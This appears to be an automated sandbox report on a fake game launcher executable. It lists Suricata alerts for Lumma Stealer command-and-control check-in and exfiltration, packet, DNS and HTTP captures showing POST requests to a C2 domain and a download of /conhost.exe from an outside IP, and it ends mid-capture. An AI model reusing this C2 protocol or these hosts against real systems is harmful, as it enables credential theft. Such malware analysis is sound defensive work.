ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile

GDI32.dll

CreateEllipticRgn

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T15:05:59.751154+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:06:00.435968+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:06:00.435968+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:06:01.704643+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.33.116	443	TCP
2024-11-23T15:06:02.409509+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.33.116	443	TCP
2024-11-23T15:06:02.409509+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.33.116	443	TCP
2024-11-23T15:06:04.285115+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.33.116	443	TCP
2024-11-23T15:06:06.513365+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.33.116	443	TCP
2024-11-23T15:06:08.727761+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.33.116	443	TCP
2024-11-23T15:06:11.203989+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.33.116	443	TCP
2024-11-23T15:06:11.941657+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49735	104.21.33.116	443	TCP
2024-11-23T15:06:13.720808+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.33.116	443	TCP
2024-11-23T15:06:17.766046+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.33.116	443	TCP
2024-11-23T15:06:18.463443+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	104.21.33.116	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 15:05:58.375926018 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:05:58.375977993 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:05:58.376075983 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:05:58.379306078 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:05:58.379323006 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:05:59.751030922 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:05:59.751153946 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:05:59.753099918 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:05:59.753110886 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:05:59.753523111 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:05:59.793725967 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:05:59.823849916 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:05:59.823874950 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:05:59.823987007 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:00.435988903 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:00.436116934 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:00.436193943 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:00.439770937 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:00.439795971 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:00.483357906 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:00.483455896 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:00.483558893 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:00.483810902 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:00.483848095 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:01.704385996 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:01.704643011 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:01.705905914 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:01.705919027 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:01.706317902 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:01.707701921 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:01.707731962 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:01.707802057 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.409524918 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.409586906 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.409627914 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.409663916 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.409670115 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.409698963 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.409723997 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.409746885 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.409782887 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.409790039 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.415693998 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.415760994 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.415770054 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.432634115 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.432683945 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.432693958 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.481215954 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.529750109 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.574951887 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.574975967 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.600833893 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.600927114 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.600944996 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.600977898 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.601027012 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.634746075 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.634776115 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:02.634790897 CET	49731	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:02.634798050 CET	443	49731	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:03.069087029 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:03.069154024 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:03.069224119 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:03.069647074 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:03.069660902 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:04.284770012 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:04.285115004 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:04.286215067 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:04.286228895 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:04.287175894 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:04.288364887 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:04.288521051 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:04.288563013 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:04.288641930 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:04.288657904 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:05.094767094 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:05.095021009 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:05.095046043 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:05.095099926 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:05.164247036 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:05.164288044 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:05.164352894 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:05.164733887 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:05.164747000 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:06.513289928 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:06.513365030 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:06.514499903 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:06.514513016 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:06.515393019 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:06.516498089 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:06.516594887 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:06.516625881 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:07.265903950 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:07.266187906 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:07.266307116 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:07.266485929 CET	49733	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:07.266511917 CET	443	49733	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:07.465239048 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:07.465316057 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:07.465414047 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:07.465828896 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:07.465842962 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:08.727663040 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:08.727761030 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:08.729060888 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:08.729070902 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:08.729381084 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:08.730477095 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:08.730626106 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:08.730658054 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:08.730716944 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:08.730726004 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:09.625839949 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:09.626087904 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:09.626249075 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:09.626249075 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:09.929033041 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:09.929081917 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:09.929162025 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:09.929461956 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:09.929475069 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:11.203865051 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:11.203989029 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:11.205755949 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:11.205769062 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:11.206197977 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:11.207724094 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:11.207822084 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:11.207832098 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:11.941689014 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:11.941827059 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:11.941927910 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:11.942109108 CET	49735	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:11.942132950 CET	443	49735	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:12.459300995 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:12.459367037 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:12.459542036 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:12.459822893 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:12.459836960 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.720710039 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.720808029 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.728995085 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.729016066 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.729512930 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.741194010 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.745125055 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.745193005 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.745399952 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.745456934 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.745568991 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.745824099 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.745945930 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.745986938 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.746134043 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.746182919 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.746323109 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.746354103 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.746366978 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.746381044 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.746486902 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.746526003 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.746541023 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.746649981 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.746678114 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.746716022 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.746737957 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.791352034 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:13.791510105 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.791562080 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.791588068 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:13.839345932 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:14.202658892 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:16.525747061 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:16.525881052 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:16.525979996 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:16.528615952 CET	49736	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:16.528642893 CET	443	49736	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:16.546622992 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:16.546662092 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:16.546753883 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:16.547245979 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:16.547257900 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:17.765976906 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:17.766046047 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:17.788995028 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:17.789015055 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:17.790041924 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:17.811683893 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:17.811713934 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:17.811861992 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:18.463454008 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:18.463568926 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:18.463685989 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:18.463885069 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:18.463937044 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:18.463970900 CET	49738	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:06:18.463988066 CET	443	49738	104.21.33.116	192.168.2.4
Nov 23, 2024 15:06:18.465718985 CET	49740	80	192.168.2.4	147.45.47.81
Nov 23, 2024 15:06:18.585251093 CET	80	49740	147.45.47.81	192.168.2.4
Nov 23, 2024 15:06:18.585339069 CET	49740	80	192.168.2.4	147.45.47.81
Nov 23, 2024 15:06:18.585519075 CET	49740	80	192.168.2.4	147.45.47.81
Nov 23, 2024 15:06:18.705142021 CET	80	49740	147.45.47.81	192.168.2.4
Nov 23, 2024 15:06:40.569561958 CET	80	49740	147.45.47.81	192.168.2.4
Nov 23, 2024 15:06:40.569842100 CET	49740	80	192.168.2.4	147.45.47.81
Nov 23, 2024 15:06:40.570014954 CET	49740	80	192.168.2.4	147.45.47.81
Nov 23, 2024 15:06:40.689415932 CET	80	49740	147.45.47.81	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 15:05:58.017680883 CET	63896	53	192.168.2.4	1.1.1.1
Nov 23, 2024 15:05:58.370604038 CET	53	63896	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 15:05:58.017680883 CET	192.168.2.4	1.1.1.1	0x84ff	Standard query (0)	property-imper.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 15:05:58.370604038 CET	1.1.1.1	192.168.2.4	0x84ff	No error (0)	property-imper.sbs		104.21.33.116	A (IP address)	IN (0x0001)	false
Nov 23, 2024 15:05:58.370604038 CET	1.1.1.1	192.168.2.4	0x84ff	No error (0)	property-imper.sbs		172.67.162.84	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

property-imper.sbs

147.45.47.81

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	147.45.47.81	80	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 15:06:18.585519075 CET	198	OUT	GET /conhost.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 147.45.47.81

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.33.116	443	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:05:59 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: property-imper.sbs
2024-11-23 14:05:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 14:06:00 UTC	1018	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:06:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n5g4nuk5q2req9o5u0u24gsc9m; expires=Wed, 19-Mar-2025 07:52:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ydtRdOPnLb7yy0JIEfZNCl7Dp5a2Cj4Efk%2BpOJ%2BtZYdfQMiTWEgaLtvzjoYPp8nbImGA%2BE8UX%2BWffjubTI%2BLvE4juqshaoPpXWCBGWoOQjk%2BHhLbxUZA3PjaAQl0xxtjx1QE4A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71b7a2287c42fb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=95431&cwnd=230&unsent_bytes=0&cid=a0256ab48dbdd573&ts=733&x=0"
2024-11-23 14:06:00 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-23 14:06:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.33.116	443	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:06:01 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 51 Host: property-imper.sbs
2024-11-23 14:06:01 UTC	51	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@saschkaq&j=
2024-11-23 14:06:02 UTC	1023	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:06:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8rk5eak196jq4f7ih1gldd8hvm; expires=Wed, 19-Mar-2025 07:52:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VhU%2FDtUX%2Bozv7GARnr%2FK7%2FqfqqXzeXgfbbQi1aeGvITQqCgR%2BSfmXuJ3yO3RVq0%2Ftf7xKMvEWY8UHtiufbXrZ8SFSDw%2BV64nE%2Fq2kGzeSml5scOJbrMnzc6aazn9AsKGPZWVSPQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71b7ae5b7c42f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1703&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=953&delivery_rate=1690793&cwnd=231&unsent_bytes=0&cid=ca2f199c971d6c4e&ts=717&x=0"
2024-11-23 14:06:02 UTC	346	IN	Data Raw: 31 35 32 35 0d 0a 53 6d 63 39 59 2f 4f 48 35 32 4f 2f 65 4b 4e 34 68 72 71 78 39 4a 53 74 64 42 34 66 71 42 77 54 35 4f 4e 38 6e 4c 47 67 66 53 63 78 52 55 74 42 79 62 50 4c 51 63 77 64 67 55 4c 79 79 4d 53 52 75 49 38 56 65 6a 32 53 65 6e 4b 49 6b 42 6d 77 6b 39 59 51 42 58 41 42 58 41 2b 41 34 73 74 42 32 67 43 42 51 74 33 42 6b 35 48 36 6a 30 34 38 65 73 4a 2b 63 6f 69 42 48 66 66 65 30 42 46 45 49 67 74 61 43 35 62 6b 67 77 4c 54 46 63 59 64 34 39 76 62 6d 76 33 41 48 48 4d 39 68 44 35 32 6e 73 46 47 76 76 7a 46 43 55 59 48 42 6b 34 49 30 66 72 4c 47 4a 30 64 7a 56 71 38 6d 4e 43 52 39 73 45 53 65 6e 54 41 64 48 75 41 67 42 6a 32 77 63 6b 62 54 79 49 46 57 51 71 63 37 5a 63 50 32 52 4c 4e 47 2b 6e 62 6b 39 69 32 79 41 34 38 4a 59 6f 74 51 34 57 51 44 Data Ascii: 1525Smc9Y/OH52O/eKN4hrqx9JStdB4fqBwT5ON8nLGgfScxRUtBybPLQcwdgULyyMSRuI8Vej2SenKIkBmwk9YQBXABXA+A4stB2gCBQt3Bk5H6j048esJ+coiBHffe0BFEIgtaC5bkgwLTFcYd49vbmv3AHHM9hD52nsFGvvzFCUYHBk4I0frLGJ0dzVq8mNCR9sESenTAdHuAgBj2wckbTyIFWQqc7ZcP2RLNG+nbk9i2yA48JYotQ4WQD
2024-11-23 14:06:02 UTC	1369	IN	Data Raw: 42 58 42 46 57 51 2b 51 36 49 55 54 31 52 48 4b 48 2f 62 54 32 70 76 37 7a 78 74 32 63 73 6c 2b 64 6f 79 4c 45 66 54 58 7a 78 4a 44 4b 41 55 66 54 39 48 69 6e 55 47 46 57 75 49 66 39 4e 2f 66 67 4c 54 31 56 6d 4d 7a 30 7a 35 32 69 73 46 47 76 74 76 48 48 45 59 6a 43 6c 77 4a 6d 76 65 46 45 39 73 58 78 41 6a 69 33 64 32 63 39 64 30 63 63 6e 76 4a 64 33 71 50 68 42 6e 36 6b 34 78 66 51 6a 42 46 42 30 47 77 36 49 34 4e 31 77 33 42 57 76 75 57 79 74 62 78 77 31 59 6b 50 63 35 2f 64 59 65 46 45 50 44 58 7a 68 6c 4c 4a 51 70 5a 43 35 48 69 6a 77 6e 56 47 38 77 52 36 39 6a 57 6d 2f 4c 4a 47 6e 31 34 69 6a 41 78 67 5a 6c 65 70 70 50 73 47 45 59 36 52 32 6f 43 6e 2b 75 43 46 35 30 46 6a 77 4f 6b 33 39 2f 57 72 6f 38 59 65 58 4c 59 66 32 4f 44 6a 77 7a 79 31 73 51 Data 